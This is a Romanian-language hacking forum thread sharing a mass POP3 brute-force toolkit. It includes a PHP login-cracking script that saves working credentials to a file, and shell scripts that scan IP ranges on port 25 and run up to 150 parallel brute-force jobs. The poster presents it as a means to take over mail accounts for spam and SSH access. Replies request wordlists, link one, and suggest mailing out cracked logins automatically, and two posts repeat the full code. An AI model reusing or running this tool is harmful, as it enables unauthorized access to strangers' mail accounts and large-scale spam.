UstupidMF Posted September 14, 2010 Report Share Posted September 14, 2010 L-am gasit pe un server si face treaba,scanatzi port 25 ... punetzi la bruteforce si dupa ce va plictisiti si va apucatzi sa le luatzi la puricat,incercatzi port,23,22,1080,21 ssh si telnet,merg majoritatea pt ssh loginCare se ocupa cu spam ... poate trimite mailuri de pe usere la udrea.rocat sesion.php<?phperror_reporting(0);function POPa($username, $password, $server) {$socket = fsockopen($server, 110); // POP3 portif (!$socket) {return "cracked";}$res = fgets($socket, 512); // read +OKif (substr(trim($res), 0, 3) != "+OK") {return "cracked"; // return the error}fputs($socket, "USER $username\r\n"); // send user$res = fgets($socket, 512); // read +OKif (substr(trim($res), 0, 3) != "+OK") {return "cracked";}fputs($socket, "PASS $password\r\n"); // send pass$res = fgets($socket, 512); // read +OKif (substr(trim($res), 0, 3) != "+OK") {return $res;}fputs($socket, "QUIT\r\n"); // quitfclose($socket);$fp = fopen("vuln.txt", "a+");fwrite($fp, "$server $username $password\n");fclose($fp);return "cracked";}//SET INITIAL LOAD$ip = $argv[1];//READ USER/PASS FILE$fp = fopen("pass_file", "r");$i = 1;$c2= 1;while (!feof($fp)) {$propozitie = fgets($fp, 4096);$propozitie = explode(" ", $propozitie);$user[$i] = $propozitie[0];@$pass[$i] = $propozitie[1];$i = $i + 1;$c2 = $c2 + 1;}fclose($fp);//Do BRUTE-FORCE ATACK$x = 1;$chestie = "not";while (( $x < $c2 ) and ( $chestie != "cracked" )) {$chestie = POPa($user[$x], $pass[$x], $ip);if ( $chestie == "cracked" ) {$quit = 1;}$x = $x + 1;}//SET END LOAD?>cat mass./ss 25 -b $1.0 -i eth0 -s 10./ss 25 -b $1.1 -i eth0 -s 10./ss 25 -b $1.2 -i eth0 -s 10./ss 25 -b $1.3 -i eth0 -s 10./ss 25 -b $1.4 -i eth0 -s 10./ss 25 -b $1.5 -i eth0 -s 10./ss 25 -b $1.6 -i eth0 -s 10./ss 25 -b $1.7 -i eth0 -s 10./ss 25 -b $1.8 -i eth0 -s 10./ss 25 -b $1.9 -i eth0 -s 10./ss 25 -b $1.10 -i eth0 -s 10cat bios.txt | sort | uniq > mfu.txtCONTOR=0for i in `cat mfu.txt`doCONTOR=`ps aux | grep -c php`while [ $CONTOR -ge 150 ];doCONTOR=`ps aux | grep -c php`echo "Sleeping"sleep 5doneif [ $CONTOR -le 150 ]; thenphp sesion.php $i > /dev/null &fidonesleep 10rm -rf bios.txt mfu.txt./ss 25 -b $1.11 -i eth0 -s 10./ss 25 -b $1.12 -i eth0 -s 10./ss 25 -b $1.13 -i eth0 -s 10./ss 25 -b $1.14 -i eth0 -s 10./ss 25 -b $1.15 -i eth0 -s 10./ss 25 -b $1.16 -i eth0 -s 10./ss 25 -b $1.17 -i eth0 -s 10./ss 25 -b $1.18 -i eth0 -s 10./ss 25 -b $1.19 -i eth0 -s 10./ss 25 -b $1.20 -i eth0 -s 10cat bios.txt | sort | uniq > mfu.txtCONTOR=0for i in `cat mfu.txt`doCONTOR=`ps aux | grep -c php`while [ $CONTOR -ge 150 ];doCONTOR=`ps aux | grep -c php`echo "Sleeping"sleep 5doneif [ $CONTOR -le 150 ]; thenphp sesion.php $i > /dev/null &fidonesleep 10rm -rf bios.txt mfu.txtcat startecho "POP3 BruteForce"echo "By(val) Rsx200"./ps $1 25sleep 5echo "Doing BruteForce..."cat $1.pscan.25 | sort | uniq > mfu.txtCONTOR=0for i in `cat mfu.txt`doCONTOR=`ps aux | grep -c php`while [ $CONTOR -ge 150 ];doCONTOR=`ps aux | grep -c php`echo "Sleeping"sleep 5doneif [ $CONTOR -le 150 ]; thenphp sesion.php $i > /dev/null &fidone Quote Link to comment Share on other sites More sharing options...
Zatarra Posted September 16, 2010 Report Share Posted September 16, 2010 Mersi. O sa`l probez mai pe seara si revin cu edit. Din cate vad eu iti trebuie si un pass_file. Quote Link to comment Share on other sites More sharing options...
Guest vini4p Posted September 18, 2010 Report Share Posted September 18, 2010 check you PM Quote Link to comment Share on other sites More sharing options...
codehunter Posted October 2, 2010 Report Share Posted October 2, 2010 deci? ceva interesant ... iese de un mass brute force ? Quote Link to comment Share on other sites More sharing options...
bresti2 Posted November 23, 2010 Report Share Posted November 23, 2010 as dori si eu un pass file Quote Link to comment Share on other sites More sharing options...
napoletanii Posted December 8, 2010 Report Share Posted December 8, 2010 ftp://ftp2.msk.ru.openwall.com/pub/wordlists/all.gz pass file .. Quote Link to comment Share on other sites More sharing options...
Caracal Posted December 9, 2010 Report Share Posted December 9, 2010 si fisierul "ss" ? Quote Link to comment Share on other sites More sharing options...
johnyinc Posted December 9, 2010 Report Share Posted December 9, 2010 fisierul "Ss" ( synscan ) il poti lua de pe google, ultima versiune si ti-o compileziin legatura cu scriptul, ce pot sa zic este ca il folosesc de aprox 2 aniface brute force pt Pop3, din 3000 aproximativ, cam 200 sunt si smtp-uri, deci mare treaba cu el nu ecum a zis OP, nu e asa usor incat sa schimbi portul si face brute pt ssh, ftp sau altele, e doar pt Pop3ar fi frumos daca cineva s-ar ocupa sa ii schimbe socket-urile pt comenzile care se dau prin smtp, in base64le am eu, doar ca nu ma pricep sa fac astaun sfat pentru cei care il folosesc : bagati-va si functia mail() in script, sa numai stai toata ziua sa verificati loguri prin rooturi sau shelluri Quote Link to comment Share on other sites More sharing options...
ciuturax Posted February 10, 2011 Report Share Posted February 10, 2011 Download smtpnou.tgz for free on Filesonic.comDownload pop3.tar.gz for free on Filesonic.com... Quote Link to comment Share on other sites More sharing options...
maxvolrat Posted February 14, 2011 Report Share Posted February 14, 2011 How to use it ? ... How to install? , any manual or tutorial ? Quote Link to comment Share on other sites More sharing options...
doiulyka Posted June 2, 2011 Report Share Posted June 2, 2011 reuploadeaza si tu smtp scan sa vad despre ce e vb. Merci! Quote Link to comment Share on other sites More sharing options...
sectorzueira Posted October 14, 2011 Report Share Posted October 14, 2011 Can you give it to UBUNTU 11.04 ? Thanks, in ubuntu no save ip's on txt...sorry to myd bad english. cat vuln.txt = 0 ip's ;/ in centos = 100% in ubuntu =0% help me please L-am gasit pe un server si face treaba,scanatzi port 25 ... punetzi la bruteforce si dupa ce va plictisiti si va apucatzi sa le luatzi la puricat,incercatzi port,23,22,1080,21 ssh si telnet,merg majoritatea pt ssh loginCare se ocupa cu spam ... poate trimite mailuri de pe usere la udrea.rocat sesion.php<?phperror_reporting(0);function POPa($username, $password, $server) {$socket = fsockopen($server, 110); // POP3 portif (!$socket) {return "cracked";}$res = fgets($socket, 512); // read +OKif (substr(trim($res), 0, 3) != "+OK") {return "cracked"; // return the error}fputs($socket, "USER $username\r\n"); // send user$res = fgets($socket, 512); // read +OKif (substr(trim($res), 0, 3) != "+OK") {return "cracked";}fputs($socket, "PASS $password\r\n"); // send pass$res = fgets($socket, 512); // read +OKif (substr(trim($res), 0, 3) != "+OK") {return $res;}fputs($socket, "QUIT\r\n"); // quitfclose($socket);$fp = fopen("vuln.txt", "a+");fwrite($fp, "$server $username $password\n");fclose($fp);return "cracked";}//SET INITIAL LOAD$ip = $argv[1];//READ USER/PASS FILE$fp = fopen("pass_file", "r");$i = 1;$c2= 1;while (!feof($fp)) {$propozitie = fgets($fp, 4096);$propozitie = explode(" ", $propozitie);$user[$i] = $propozitie[0];@$pass[$i] = $propozitie[1];$i = $i + 1;$c2 = $c2 + 1;}fclose($fp);//Do BRUTE-FORCE ATACK$x = 1;$chestie = "not";while (( $x < $c2 ) and ( $chestie != "cracked" )) {$chestie = POPa($user[$x], $pass[$x], $ip);if ( $chestie == "cracked" ) {$quit = 1;}$x = $x + 1;}//SET END LOAD?>cat mass./ss 25 -b $1.0 -i eth0 -s 10./ss 25 -b $1.1 -i eth0 -s 10./ss 25 -b $1.2 -i eth0 -s 10./ss 25 -b $1.3 -i eth0 -s 10./ss 25 -b $1.4 -i eth0 -s 10./ss 25 -b $1.5 -i eth0 -s 10./ss 25 -b $1.6 -i eth0 -s 10./ss 25 -b $1.7 -i eth0 -s 10./ss 25 -b $1.8 -i eth0 -s 10./ss 25 -b $1.9 -i eth0 -s 10./ss 25 -b $1.10 -i eth0 -s 10cat bios.txt | sort | uniq > mfu.txtCONTOR=0for i in `cat mfu.txt`doCONTOR=`ps aux | grep -c php`while [ $CONTOR -ge 150 ];doCONTOR=`ps aux | grep -c php`echo "Sleeping"sleep 5doneif [ $CONTOR -le 150 ]; thenphp sesion.php $i > /dev/null &fidonesleep 10rm -rf bios.txt mfu.txt./ss 25 -b $1.11 -i eth0 -s 10./ss 25 -b $1.12 -i eth0 -s 10./ss 25 -b $1.13 -i eth0 -s 10./ss 25 -b $1.14 -i eth0 -s 10./ss 25 -b $1.15 -i eth0 -s 10./ss 25 -b $1.16 -i eth0 -s 10./ss 25 -b $1.17 -i eth0 -s 10./ss 25 -b $1.18 -i eth0 -s 10./ss 25 -b $1.19 -i eth0 -s 10./ss 25 -b $1.20 -i eth0 -s 10cat bios.txt | sort | uniq > mfu.txtCONTOR=0for i in `cat mfu.txt`doCONTOR=`ps aux | grep -c php`while [ $CONTOR -ge 150 ];doCONTOR=`ps aux | grep -c php`echo "Sleeping"sleep 5doneif [ $CONTOR -le 150 ]; thenphp sesion.php $i > /dev/null &fidonesleep 10rm -rf bios.txt mfu.txtcat startecho "POP3 BruteForce"echo "By(val) Rsx200"./ps $1 25sleep 5echo "Doing BruteForce..."cat $1.pscan.25 | sort | uniq > mfu.txtCONTOR=0for i in `cat mfu.txt`doCONTOR=`ps aux | grep -c php`while [ $CONTOR -ge 150 ];doCONTOR=`ps aux | grep -c php`echo "Sleeping"sleep 5doneif [ $CONTOR -le 150 ]; thenphp sesion.php $i > /dev/null &fidone Quote Link to comment Share on other sites More sharing options...
valdez2020 Posted October 15, 2011 Report Share Posted October 15, 2011 L-am gasit pe un server si face treaba,scanatzi port 25 ... punetzi la bruteforce si dupa ce va plictisiti si va apucatzi sa le luatzi la puricat,incercatzi port,23,22,1080,21 ssh si telnet,merg majoritatea pt ssh loginCare se ocupa cu spam ... poate trimite mailuri de pe usere la udrea.rocat sesion.php<?phperror_reporting(0);function POPa($username, $password, $server) {$socket = fsockopen($server, 110); // POP3 portif (!$socket) {return "cracked";}$res = fgets($socket, 512); // read +OKif (substr(trim($res), 0, 3) != "+OK") {return "cracked"; // return the error}fputs($socket, "USER $username\r\n"); // send user$res = fgets($socket, 512); // read +OKif (substr(trim($res), 0, 3) != "+OK") {return "cracked";}fputs($socket, "PASS $password\r\n"); // send pass$res = fgets($socket, 512); // read +OKif (substr(trim($res), 0, 3) != "+OK") {return $res;}fputs($socket, "QUIT\r\n"); // quitfclose($socket);$fp = fopen("vuln.txt", "a+");fwrite($fp, "$server $username $password\n");fclose($fp);return "cracked";}//SET INITIAL LOAD$ip = $argv[1];//READ USER/PASS FILE$fp = fopen("pass_file", "r");$i = 1;$c2= 1;while (!feof($fp)) {$propozitie = fgets($fp, 4096);$propozitie = explode(" ", $propozitie);$user[$i] = $propozitie[0];@$pass[$i] = $propozitie[1];$i = $i + 1;$c2 = $c2 + 1;}fclose($fp);//Do BRUTE-FORCE ATACK$x = 1;$chestie = "not";while (( $x < $c2 ) and ( $chestie != "cracked" )) {$chestie = POPa($user[$x], $pass[$x], $ip);if ( $chestie == "cracked" ) {$quit = 1;}$x = $x + 1;}//SET END LOAD?>cat mass./ss 25 -b $1.0 -i eth0 -s 10./ss 25 -b $1.1 -i eth0 -s 10./ss 25 -b $1.2 -i eth0 -s 10./ss 25 -b $1.3 -i eth0 -s 10./ss 25 -b $1.4 -i eth0 -s 10./ss 25 -b $1.5 -i eth0 -s 10./ss 25 -b $1.6 -i eth0 -s 10./ss 25 -b $1.7 -i eth0 -s 10./ss 25 -b $1.8 -i eth0 -s 10./ss 25 -b $1.9 -i eth0 -s 10./ss 25 -b $1.10 -i eth0 -s 10cat bios.txt | sort | uniq > mfu.txtCONTOR=0for i in `cat mfu.txt`doCONTOR=`ps aux | grep -c php`while [ $CONTOR -ge 150 ];doCONTOR=`ps aux | grep -c php`echo "Sleeping"sleep 5doneif [ $CONTOR -le 150 ]; thenphp sesion.php $i > /dev/null &fidonesleep 10rm -rf bios.txt mfu.txt./ss 25 -b $1.11 -i eth0 -s 10./ss 25 -b $1.12 -i eth0 -s 10./ss 25 -b $1.13 -i eth0 -s 10./ss 25 -b $1.14 -i eth0 -s 10./ss 25 -b $1.15 -i eth0 -s 10./ss 25 -b $1.16 -i eth0 -s 10./ss 25 -b $1.17 -i eth0 -s 10./ss 25 -b $1.18 -i eth0 -s 10./ss 25 -b $1.19 -i eth0 -s 10./ss 25 -b $1.20 -i eth0 -s 10cat bios.txt | sort | uniq > mfu.txtCONTOR=0for i in `cat mfu.txt`doCONTOR=`ps aux | grep -c php`while [ $CONTOR -ge 150 ];doCONTOR=`ps aux | grep -c php`echo "Sleeping"sleep 5doneif [ $CONTOR -le 150 ]; thenphp sesion.php $i > /dev/null &fidonesleep 10rm -rf bios.txt mfu.txtcat startecho "POP3 BruteForce"echo "By(val) Rsx200"./ps $1 25sleep 5echo "Doing BruteForce..."cat $1.pscan.25 | sort | uniq > mfu.txtCONTOR=0for i in `cat mfu.txt`doCONTOR=`ps aux | grep -c php`while [ $CONTOR -ge 150 ];doCONTOR=`ps aux | grep -c php`echo "Sleeping"sleep 5doneif [ $CONTOR -le 150 ]; thenphp sesion.php $i > /dev/null &fidoneSalut , cum pot sa fac spam cu mass bruteforcer, ma puteti ajuta si pe mine ? Quote Link to comment Share on other sites More sharing options...
icemerc Posted October 16, 2011 Report Share Posted October 16, 2011 nu sunt arhivele up , zice ca sunt sterse Quote Link to comment Share on other sites More sharing options...
Rumy Posted October 27, 2011 Report Share Posted October 27, 2011 Pe 23 scaneaza telnet sau ssh ? Din cate stiu nu exista sursa pt scanner pt telnet 23 si asta cred ca prinde smtp ftp ssh22 https,etc.. adik iti probeaza pe toate? Am un scanner la fel si deaia zic ca e cam la fel. Stie cineva daca exista vreun scanner sau ceva de genu pt telnet 23 sau sa ii poti schimba tu portu pe care vrei sa scanezi ? Quote Link to comment Share on other sites More sharing options...
Geokm5 Posted October 30, 2011 Report Share Posted October 30, 2011 vreau si eu link-u pentr mass bruteforcer asta. Quote Link to comment Share on other sites More sharing options...